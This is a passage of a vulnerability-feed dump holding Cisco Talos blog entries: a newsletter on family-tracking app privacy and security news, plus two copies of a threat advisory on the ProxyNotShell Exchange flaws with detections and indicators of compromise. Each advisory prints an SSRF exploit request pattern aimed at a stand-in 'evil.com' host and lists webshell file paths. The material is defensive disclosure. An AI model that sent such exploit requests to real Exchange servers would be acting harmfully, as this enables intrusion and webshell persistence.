#115: An \"insider threat\" ](<https://www.buzzsprout.com/2018149/episodes/11413990>)doesn't always have to know they're a threat\n * [Cobalt Strike malware campaign targets job seekers](<https://www.techtarget.com/searchsecurity/news/252525560/Cobalt-Strike-malware-campaign-targets-job-seekers>)\n * [Government, Union-Themed Lures Used to Deliver Cobalt Strike Payloads](<https://www.infosecurity-magazine.com/news/government-union-lures-used-cobalt/>) \n\n\n## Upcoming events where you can find Talos \n\n\n[_**Cisco Security Solution Expert Sessions**_](<https://www.blogger.com/u/1/blog/post/edit/1029833275466591797/5980034587248183130#>)** (Oct. 11 & 13)** \nVirtual \n\n \n[_**GovWare 2022**_](<https://www.blogger.com/u/1/blog/post/edit/1029833275466591797/5980034587248183130#>)** (Oct. 18 - 20)** \nSands Expo & Convention Centre, Singapore \n\n \n[_**Conference On Applied Machine Learning For Information Security**_](<https://www.blogger.com/u/1/blog/post/edit/1029833275466591797/5980034587248183130#>)_** **_**(Oct. 20 - 21)** \nSands Capital Management, Arlington, Virginia", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-06T18:00:00", "type": "talosblog", "title": "Threat Source newsletter (Oct. 
6, 2022) \u2014 Continuing down the Privacy Policy rabbit hole", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-06T18:00:00", "id": "TALOSBLOG:FB5080C7655BA3C4C2856F34457CBCD0", "href": "https://blog.talosintelligence.com/threat-source-newsletter-oct-6-2022-continuing-down-the-privacy-policy-rabbit-hole/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-06T19:13:58", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLGV0qm1JxU91RjdxVIuHS5qpDp6eR5oqC3GXE4GKh74vcE6eErdX-odGGmldK4seEV08PmWVUMwC9eHiY-MNvEWPJqq7kEe3k9gjAfn0ai-JRQnZ3GdRiAki_wed_Ctz2-MbeTD591fAVRErXhYumK3_GFcUGqEBUmnA_aeVfgK2rZKQ7AW0eYUiY/s2000/threat-source-newsletter.jpg>)\n\n \n\n\n_By Jon Munshaw. _\n\n[](<https://engage2demand.cisco.com/SubscribeTalosThreatSource>)\n\nWelcome to this week\u2019s edition of the Threat Source newsletter. \n\n \n\n\nAs I [wrote about last week](<https://blog.talosintelligence.com/2022/09/threat-source-newsletter-sept-29-2022.html>), I\u2019ve been [diving a lot into apps\u2019 privacy policies](<https://blog.talosintelligence.com/2022/09/our-current-world-health-care-apps-and.html>) recently. And I was recently made aware of a new type of app I never knew existed \u2014 family trackers. \n\n \n\n\nThere are countless mobile apps for parents to track their children or other family members based on their location, phone usage, and even driving speed. As an anxious soon-to-be-parent, this sounds intriguing to me \u2014 it\u2019d be a souped-up version of Find my Friends on Apple devices so I\u2019d never have to ask my teenager (granted, I\u2019m many years away from being at that stage of my life) when they were coming home or where they were. \n\n \n\n\nJust as with all other types of mobile apps, there are pitfalls, though. 
\n\n \n\n\nLife360, one of the most popular of these types of apps, which even tells users what their maximum driving speed was on a given trip, was found in December 2021 to be [selling precise location data](<https://themarkup.org/privacy/2021/12/06/the-popular-family-safety-app-life360-is-selling-precise-location-data-on-its-tens-of-millions-of-user>) on its users, potentially affecting millions of people. Once that precise location data is out there, there is no telling who could eventually get a hold of it. Even if Life360 doesn\u2019t intend to let adversaries see this information, they don\u2019t have direct control over how those third parties handle the information once it\u2019s sold off. \n\n \n\n\nThe [app\u2019s current and updated privacy policy](<https://support.life360.com/hc/en-us/articles/360043228154-Full-Privacy-Policy>) states that it \"may also share location information with our partners, such as Cuebiq and its Partners, for tailored advertising, attribution, analytics, research and other purposes.\u201d However, users do have the ability to opt out of this inside the app. \n\n \n\n\nThere is hardware that offers this same type of tracking. Jealous, angry or paranoid spouses and parents have used [Apple\u2019s AirTags in the past to unknowingly track people](<https://www.npr.org/2022/02/18/1080944193/apple-airtags-theft-stalking-privacy-tech>), eventually to the point that Apple had to [address the issue directly](<https://www.apple.com/newsroom/2022/02/an-update-on-airtag-and-unwanted-tracking/>) and provide several updates to AirTags\u2019 security and precise location alerts to make it easier for users to find potentially unwanted AirTags on their cars or personal belongings. \n\n \n\n\nThis is truthfully just an area of concern I had never considered before. Many parents would do anything for their children\u2019s safety, which is certainly understandable. 
But just like personal health apps, we need to consider the security trade-offs here, too. As we\u2019ve said before, [no one truly has \u201cnothing to hide,\u201d](<https://beerswithtalos.talosintelligence.com/2033817/11128173-beers-with-talos-ep-124-there-s-no-such-thing-as-i-have-nothing-to-hide>) especially when it comes to minors or vulnerable populations. I\u2019m not saying using any of these apps is inherently wrong, or that AirTags do not have their legitimate purposes. But any time we welcome this software and hardware into our homes and on our devices, it\u2019s worth considering what sacrifices we might be making elsewhere. \n\n \n\n\n \n\n\n## The one big thing \n\n[Microsoft warned last week](<https://blog.talosintelligence.com/2022/09/threat-advisory-exchange-server-vulns.html>) of the exploitation of two recently disclosed vulnerabilities collectively referred to as \"ProxyNotShell,\" affecting Microsoft Exchange Servers 2013, 2016 and 2019. One of these vulnerabilities could allow an attacker to execute remote code on the targeted server. Limited exploitation of these vulnerabilities in the wild has been reported. CVE-2022-41040 is a Server-Side Request Forgery (SSRF) vulnerability, while CVE-2022-41082 enables Remote Code Execution (RCE) when PowerShell is accessible to the attackers. \n\n> ### Why do I care? \n> \n> Exchange vulnerabilities have become increasingly popular with threat actors, as they can provide initial access to network environments and are often used to facilitate more effective phishing and malspam campaigns. The Hafnium threat actor exploited several zero-day vulnerabilities in Exchange Server in 2021 to deliver ransomware, and Cisco Talos Incident Response reported that the exploitation of Exchange Server issues was one of the four attacks they saw most often last year. 
\n> \n> ### So now what?\n\n> While no fixes or patches are available yet, Microsoft has [provided mitigations](<https://www.darkreading.com/remote-workforce/microsoft-updates-mitigation-for-exchange-server-zero-days>) for on-premises Microsoft Exchange users on Sept. 29, 2022. Even organizations that use Exchange Online may still be affected if they run a hybrid server. While Microsoft continues to update their mitigations, some security researchers [posit they can be bypassed](<https://twitter.com/GossiTheDog/status/1575813395835547651>). Talos has released several Snort rules to detect the exploitation of these vulnerabilities and associate malware families used in these attacks. \n\n> \n\n## Top security headlines from the week\n\n \n\n\nMore than 2 million Australians\u2019 personal information is at risk after a data breach at telecommunications giant Optus. More than 1.2 million customers have had at least one ID number from a current and valid form of identification, along with other personal data, according to an update from the company\u2019s CEO. Adding to the confusion, the company told many residents in New South Wales that it would need to replace their driver\u2019s license, only to later backtrack to say that would not be the case for everyone affected. Optus says it enlisted a third party to complete a thorough review of the compromise to identify security gaps and any other potential fallout. ([ABC News](<https://www.abc.net.au/news/2022-10-03/optus-data-breach-cyber-attack-deloitte-review-audit/101496190>), [Nine News](<https://www.9news.com.au/national/optus-data-breach-update-more-than-two-million-customer-identity-details-exposed/b92b17d9-fc77-430b-94ca-21def7fea61d>)) \n\nThe Vice Society ransomware group leaked more than 500 GB worth of data on employees and students at the unified Los Angeles School District after the district refused to pay a requested extortion payment after a ransomware attack several weeks ago. 
Officials said the leak was less extensive than originally expected and limited to attendance and academic records from 2013 - 2016. The district declined to pay the ransom because there was no guarantee that the actors would not leak the information anyway. Threat actors have commonly targeted the education sector with ransomware attacks as the school year started and their networks were particularly vulnerable. ([Axios](<https://www.axios.com/2022/10/03/hackers-stolen-data-la-school-district-ransomware>), [Los Angeles Times](<https://www.latimes.com/california/story/2022-10-03/hackers-cyberattack-los-angeles-unified-school-district-hotline-parents-staff-vice-society>)) \n\nThe infamous Lazarus Group threat actor continues to ramp up its activity, recently exploiting open-source software and Dell hardware to target companies all over the globe. A recent report from Microsoft found that the group was impersonating contributors to open-source projects and injecting malicious updates for that software to users. In a separate campaign, the APT also used an exploit in a Dell firmware driver to deliver a Windows rootkit targeting an aerospace company and high-profile journalist in Belgium. Lazarus Group is known for operating with North Korean state interests, often stealing cryptocurrency or finding other ways to earn money. ([Bleeping Computer](<https://www.bleepingcomputer.com/news/security/microsoft-lazarus-hackers-are-weaponizing-open-source-software/>), [Security Affairs](<https://securityaffairs.co/wordpress/136623/apt/lazarus-exploit-dell-firmware-driver.html>)) \n\n \n\n\n## Can\u2019t get enough Talos? \n\n * * _[Developer account body snatchers pose risks to the software supply chain](<https://blog.talosintelligence.com/2022/10/developer-account-body-snatchers-pose.html>)_\n * _[Researcher Spotlight: Globetrotting with Yuri Kramarz](<https://blog.talosintelligence.com/2022/10/researcher-spotlight-globetrotting-with.html>)_\n * _[Threat Roundup for Sept. 
23 - 30](<https://blog.talosintelligence.com/2022/09/threat-roundup-0923-0930.html>)_\n * _[Talos Takes Ep. #115: An \"insider threat\" doesn't always have to know they're a threat](<https://www.buzzsprout.com/2018149/episodes/11413990>)_\n * _[Cobalt Strike malware campaign targets job seekers](<https://www.techtarget.com/searchsecurity/news/252525560/Cobalt-Strike-malware-campaign-targets-job-seekers>)_\n * _[Government, Union-Themed Lures Used to Deliver Cobalt Strike Payloads](<https://www.infosecurity-magazine.com/news/government-union-lures-used-cobalt/>)_\n \n\n\n## Upcoming events where you can find Talos \n\n \n\n\n**_[Cisco Security Solution Expert Sessions](<https://web.cvent.com/event/f150cd18-061b-4c25-b617-044c50cac855/summary>)_ (Oct. 11 & 13)**\n\nVirtual \n\n \n\n\n**_[GovWare 2022](<https://www.govware.sg/govware/2022/event-info>)_ (Oct. 18 - 20)**\n\nSands Expo & Convention Centre, Singapore \n\n \n\n\n**_[Conference On Applied Machine Learning For Information Security](<https://www.camlis.org/>) _**** (Oct. 
20 - 21)**\n\nSands Capital Management, Arlington, Virginia \n\n \n\n\n## Most prevalent malware files from Talos telemetry over the past week \n\n** \n**\n\n**SHA 256: **[c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0](<https://www.virustotal.com/gui/file/c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0/details>) \n\n**MD5: **8c69830a50fb85d8a794fa46643493b2 \n\n**Typical Filename: **AAct.exe \n\n**Claimed Product: **N/A \n\n**Detection Name: **PUA.Win.Dropper.Generic::1201 \n\n** \n**\n\n**SHA 256: **[e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934](<https://www.virustotal.com/gui/file/e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934/details>)** \n****MD5: **93fefc3e88ffb78abb36365fa5cf857c ** \n****Typical Filename: **Wextract \n**Claimed Product: **Internet Explorer \n**Detection Name: **PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg \n\n \n\n\n**SHA 256: **[58d6fec4ba24c32d38c9a0c7c39df3cb0e91f500b323e841121d703c7b718681](<https://www.virustotal.com/gui/file/58d6fec4ba24c32d38c9a0c7c39df3cb0e91f500b323e841121d703c7b718681/details>) \n\n**MD5: **f1fe671bcefd4630e5ed8b87c9283534 \n\n**Typical Filename: **KMSAuto Net.exe \n\n**Claimed Product: **KMSAuto Net \n\n**Detection Name: **PUA.Win.Tool.Hackkms::1201 \n\n** \n**\n\n**SHA 256: **[e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c](<https://www.virustotal.com/gui/file/e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c/details>)** **\n\n**MD5: **a087b2e6ec57b08c0d0750c60f96a74c\n\n**Typical Filename: **AAct.exe** **\n\n**Claimed Product: **N/A \n\n**Detection Name: **PUA.Win.Tool.Kmsauto::1201 \n\n** \n**\n\n**SHA 256: **[63d543945e33b4b6088dc34d0550213dc73ea6acce248d8353c63039e8fa284f](<https://www.virustotal.com/gui/file/63d543945e33b4b6088dc34d0550213dc73ea6acce248d8353c63039e8fa284f/details>) \n\n**MD5: **a779d230c944ef200bce074407d2b8ff \n\n**Typical Filename: **mediaget.exe** **\n\n**Claimed Product: **MediaGet 
\n\n**Detection Name: **W32.File.MalParent", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-06T18:00:00", "type": "talosblog", "title": "Threat Source newsletter (Oct. 6, 2022) \u2014 Continuing down the Privacy Policy rabbit hole", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-06T18:00:00", "id": "TALOSBLOG:12103F398364269083FD96139F0F6562", "href": "http://blog.talosintelligence.com/2022/10/threat-source-newsletter-oct-6-2022.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-26T20:06:00", "description": "\n\nCisco Talos has released new coverage to detect and prevent the exploitation of two recently [disclosed](<https://www.microsoft.com/en-us/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) vulnerabilities collectively referred to as "ProxyNotShell," affecting Microsoft Exchange Servers 2013, 2016 and 2019. One of these vulnerabilities could allow an attacker to execute remote code on the targeted server. Limited exploitation of these vulnerabilities in the wild has been reported. [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) is a Server Side Request Forgery (SSRF) vulnerability, while [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>) enables Remote Code Execution (RCE) when PowerShell is accessible to the attackers. 
\n \nWhile no fixes or patches are available yet, Microsoft has [provided mitigations](<https://www.microsoft.com/en-us/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) for on-premises Microsoft Exchange users on Sept. 29, 2022. Even organizations that use Exchange Online may still be affected if they run a hybrid server. Cisco Talos is closely monitoring the recent reports of exploitation attempts against these vulnerabilities and strongly recommends users implement mitigation steps while waiting for security patches for these vulnerabilities. Exchange vulnerabilities have become increasingly popular with threat actors, as they can provide initial access to network environments and are often used to facilitate more effective phishing and malspam campaigns. The [Hafnium threat actor](<https://blog.talosintelligence.com/hafnium-update/>) exploited several zero-day vulnerabilities in Exchange Server in 2021 to deliver ransomware, and Cisco Talos Incident Response reported that the exploitation of Exchange Server issues was [one of the four attacks they saw most often](<https://www.techtarget.com/searchsecurity/news/252502308/Cisco-Talos-Exchange-Server-flaws-accounted-for-35-of-attacks>) last year.\n\n## Vulnerability details and ongoing exploitation\n\n \nExploit requests for these vulnerabilities look similar to previously discovered ProxyShell exploitation attempts: \n \nautodiscover/autodiscover.json?@evil.com/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%3f@evil.com \n \nSuccessful exploitation of the vulnerabilities observed in the wild leads to preliminary information-gathering operations and the persistence of WebShells for continued access to compromised servers. 
Open-source reporting indicates that webshells such as Antsword, a popular Chinese language-based open-source webshell, [SharPyShell](<https://github.com/antonioCoco/SharPyShell>), an ASP.NET-based webshell, and [China Chopper](<https://blog.talosintelligence.com/china-chopper-still-active-9-years-later/>) have been deployed on compromised systems consisting of the following artifacts:\n\n * C:\\inetpub\\wwwroot\\aspnet_client\\Xml.ashx\n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\errorEE.aspx\n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\pxh4HG1v.ashx\n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\RedirSuiteServiceProxy.aspx\n\n \n \nThis activity is consistent with what is typically observed when attackers begin leveraging vulnerabilities in unpatched or vulnerable systems exposed to the internet. \n \nInitial reporting observed the download and deployment of additional malicious artifacts and implants on the infected systems using certutil; however, these TTPs may change as more threat actors start exploiting the vulnerabilities followed by their own set of post-exploitation activities.\n\n## Coverage\n\n \nWays our customers can detect and block this threat are listed below.\n\n\n\n \n[Cisco Secure Endpoint](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/index.html>) (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. 
Try Secure Endpoint for free [here.](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/free-trial.html?utm_medium=web-referral?utm_source=cisco&utm_campaign=amp-free-trial&utm_term=pgm-talos-trial&utm_content=amp-free-trial>) \n \n[Cisco Secure Web Appliance](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Cisco Secure Email](<https://www.cisco.com/c/en/us/products/security/email-security/index.html>) (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free [here](<https://www.cisco.com/c/en/us/products/security/cloud-mailbox-defense?utm_medium=web-referral&utm_source=cisco&utm_campaign=cmd-free-trial-request&utm_term=pgm-talos-trial>). \n \n[Cisco Secure Firewall](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>) (formerly Next-Generation Firewall and Firepower NGFW) appliances such as [Threat Defense Virtual](<https://www.cisco.com/c/en/us/products/collateral/security/firepower-ngfw-virtual/datasheet-c78-742858.html>), [Adaptive Security Appliance](<https://www.cisco.com/c/en/us/products/security/adaptive-security-appliance-asa-software/index.html>) and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[Cisco Secure Malware Analytics](<https://www.cisco.com/c/en/us/products/security/threat-grid/index.html>) (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. \n \n[Umbrella](<https://umbrella.cisco.com/>), Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. 
Sign up for a free trial of Umbrella [here](<https://signup.umbrella.com/?utm_medium=web-referral?utm_source=cisco&utm_campaign=umbrella-free-trial&utm_term=pgm-talos-trial&utm_content=automated-free-trial>). \n \n[Cisco Secure Web Appliance](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. \n \nAdditional protections with context to your specific environment and threat data are available from the [Firewall Management Center](<https://www.cisco.com/c/en/us/products/security/firepower-management-center/index.html>). \n \n[Cisco Duo](<https://signup.duo.com/?utm_source=talos&utm_medium=referral&utm_campaign=duo-free-trial>) provides multi-factor authentication for users to ensure only those authorized are accessing your network. \n \nCisco Talos is releasing SID **60642 **to protect against CVE-2022-41040. \n \nIn addition we are releasing SIDs **60637-60641 **to protect against malicious activity observed during exploitation of CVE-2022-41082. \n \nThe existing SIDs **27966-27968, 28323, 37245, and 42834-42838 **provide additional protection for the malicious activity observed during exploitation of CVE-2022-41082. 
\n \nThe following ClamAV signatures have been released to detect malware artifacts related to this threat:\n\n * Asp.Backdoor.AntSword-9972727-1\n * Asp.Backdoor.Awen-9972728-0\n * Asp.Backdoor.AntSword-9972729-0\n\n## IOCs\n\n### IPs and URLs\n\n125[.]212[.]220[.]48 \n5[.]180[.]61[.]17 \n47[.]242[.]39[.]92 \n61[.]244[.]94[.]85 \n86[.]48[.]6[.]69 \n86[.]48[.]12[.]64 \n94[.]140[.]8[.]48 \n94[.]140[.]8[.]113 \n103[.]9[.]76[.]208 \n103[.]9[.]76[.]211 \n104[.]244[.]79[.]6 \n112[.]118[.]48[.]186 \n122[.]155[.]174[.]188 \n125[.]212[.]241[.]134 \n185[.]220[.]101[.]182 \n194[.]150[.]167[.]88 \n212[.]119[.]34[.]11 \n137[.]184[.]67[.]33 \n206[.]188[.]196[.]77 \nhxxp://206[.]188[.]196[.]77:8080/themes.aspx", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T21:16:00", "type": "talosblog", "title": "Threat Advisory: Microsoft warns of actively exploited vulnerabilities in Exchange Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T21:16:00", "id": "TALOSBLOG:A52D0C18F59637804E33FC802E4F7F00", "href": "https://blog.talosintelligence.com/threat-advisory-microsoft-warns-of-actively-exploited-vulnerabilities-in-exchange-server/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-04T06:04:38", "description": "## \n\n \nCisco Talos has released new coverage to detect and prevent the exploitation of two recently [disclosed](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) vulnerabilities collectively referred to as 
\"ProxyNotShell,\" affecting Microsoft Exchange Servers 2013, 2016 and 2019. One of these vulnerabilities could allow an attacker to execute remote code on the targeted server. Limited exploitation of these vulnerabilities in the wild has been reported. [CVE-2022-41040](<https://cve.mitre.org/cgi-bin/cvename.cgi?name%3D2022-41040>) is a Server Side Request Forgery (SSRF) vulnerability, while [CVE-2022-41082](<https://cve.mitre.org/cgi-bin/cvename.cgi?name%3DCVE-2022-41082>) enables Remote Code Execution (RCE) when PowerShell is accessible to the attackers. \n \nWhile no fixes or patches are available yet, Microsoft has [provided mitigations](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) for on-premises Microsoft Exchange users on Sept. 29, 2022. Even organizations that use Exchange Online may still be affected if they run a hybrid server. Cisco Talos is closely monitoring the recent reports of exploitation attempts against these vulnerabilities and strongly recommends users implement mitigation steps while waiting for security patches for these vulnerabilities. Exchange vulnerabilities have become increasingly popular with threat actors, as they can provide initial access to network environments and are often used to facilitate more effective phishing and malspam campaigns. The [Hafnium threat actor](<https://blog.talosintelligence.com/2021/03/hafnium-update.html>) exploited several zero-day vulnerabilities in Exchange Server in 2021 to deliver ransomware, and Cisco Talos Incident Response reported that the exploitation of Exchange Server issues was [one of the four attacks they saw most often](<https://blog.talosintelligence.com/2022/01/talos-incident-response-year-in-review.html>) last year. 
\n \n \n\n\n## Vulnerability details and ongoing exploitation\n\n \nExploit requests for these [vulnerabilities](<https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) look similar to previously discovered ProxyShell exploitation attempts: \n \nautodiscover/autodiscover.json?@evil.com/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%3f@evil.com \n \nSuccessful exploitation of the vulnerabilities observed in the wild leads to preliminary information-gathering operations and the persistence of webshells for continued access to compromised servers. [Open-source reporting](<https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) indicates that webshells such as Antsword, a popular Chinese language-based open-source webshell, [SharPyShell](<https://github.com/antonioCoco/SharPyShell>), an ASP.NET-based webshell, and [China Chopper](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html>) have been deployed on compromised systems consisting of the following artifacts: \n \n\n\n * C:\\inetpub\\wwwroot\\aspnet_client\\Xml.ashx\n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\errorEE.aspx\n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\pxh4HG1v.ashx\n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\RedirSuiteServiceProxy.aspx\n \n \nThis activity is consistent with what is typically observed when attackers begin leveraging vulnerabilities in unpatched or vulnerable systems exposed to the internet. 
\n \nInitial reporting observed the download and deployment of additional malicious artifacts and implants on the infected systems using certutil; however, these TTPs may change as more threat actors start exploiting the vulnerabilities followed by their own set of post-exploitation activities. \n \n\n\n## Coverage\n\n \n\n\nWays our customers can detect and block this threat are listed below. \n \n\n\n\n\n \n \n[Cisco Secure Endpoint](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/index.html>) (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free [here.](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/free-trial.html?utm_medium%3Dweb-referral?utm_source%3Dcisco%26utm_campaign%3Damp-free-trial%26utm_term%3Dpgm-talos-trial%26utm_content%3Damp-free-trial>) \n \n[Cisco Secure Web Appliance](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Cisco Secure Email](<https://www.cisco.com/c/en/us/products/security/email-security/index.html>) (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free [here](<https://www.cisco.com/c/en/us/products/security/cloud-mailbox-defense?utm_medium%3Dweb-referral%26utm_source%3Dcisco%26utm_campaign%3Dcmd-free-trial-request%26utm_term%3Dpgm-talos-trial>). 
\n \n[Cisco Secure Firewall](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>) (formerly Next-Generation Firewall and Firepower NGFW) appliances such as [Threat Defense Virtual](<https://www.cisco.com/c/en/us/products/collateral/security/firepower-ngfw-virtual/datasheet-c78-742858.html>), [Adaptive Security Appliance](<https://www.cisco.com/c/en/us/products/security/adaptive-security-appliance-asa-software/index.html>) and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[Cisco Secure Malware Analytics](<https://www.cisco.com/c/en/us/products/security/threat-grid/index.html>) (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. \n \n[Umbrella](<https://umbrella.cisco.com/>), Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella [here](<https://signup.umbrella.com/?utm_medium%3Dweb-referral?utm_source%3Dcisco%26utm_campaign%3Dumbrella-free-trial%26utm_term%3Dpgm-talos-trial%26utm_content%3Dautomated-free-trial>). \n \n[Cisco Secure Web Appliance](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. \n \nAdditional protections with context to your specific environment and threat data are available from the [Firewall Management Center](<https://www.cisco.com/c/en/us/products/security/firepower-management-center/index.html>). \n \nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). \n \nCisco Talos is releasing SID **60642 **to protect against CVE-2022-41040. 
\n \nIn addition we are releasing SIDs **60637-60641** to protect against malicious activity observed during exploitation of CVE-2022-41082. \n \nThe existing SIDs **27966-27968, 28323, 37245, and 42834-42838** provide additional protection for the malicious activity observed during exploitation of CVE-2022-41082. \n \nThe following ClamAV signatures have been released to detect malware artifacts related to this threat: \n \n\n\n * Asp.Backdoor.AntSword-9972727-1\n * Asp.Backdoor.Awen-9972728-0\n * Asp.Backdoor.AntSword-9972729-0\n \n \n\n\n## IOCs\n\n### IPs and URLs\n\n125[.]212[.]220[.]48 \n5[.]180[.]61[.]17 \n47[.]242[.]39[.]92 \n61[.]244[.]94[.]85 \n86[.]48[.]6[.]69 \n86[.]48[.]12[.]64 \n94[.]140[.]8[.]48 \n94[.]140[.]8[.]113 \n103[.]9[.]76[.]208 \n103[.]9[.]76[.]211 \n104[.]244[.]79[.]6 \n112[.]118[.]48[.]186 \n122[.]155[.]174[.]188 \n125[.]212[.]241[.]134 \n185[.]220[.]101[.]182 \n194[.]150[.]167[.]88 \n212[.]119[.]34[.]11 \n137[.]184[.]67[.]33 \n206[.]188[.]196[.]77 \nhxxp://206[.]188[.]196[.]77:8080/themes.aspx", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T21:16:00", "type": "talosblog", "title": "Threat Advisory: Microsoft warns of actively exploited vulnerabilities in Exchange Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-03T13:40:20", "id": "TALOSBLOG:A0B0983119E043D75EA7712A7172A942", "href": "http://blog.talosintelligence.com/2022/09/threat-advisory-exchange-server-vulns.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "qualysblog": [{"lastseen": "2022-10-11T12:05:09", "description": "On 
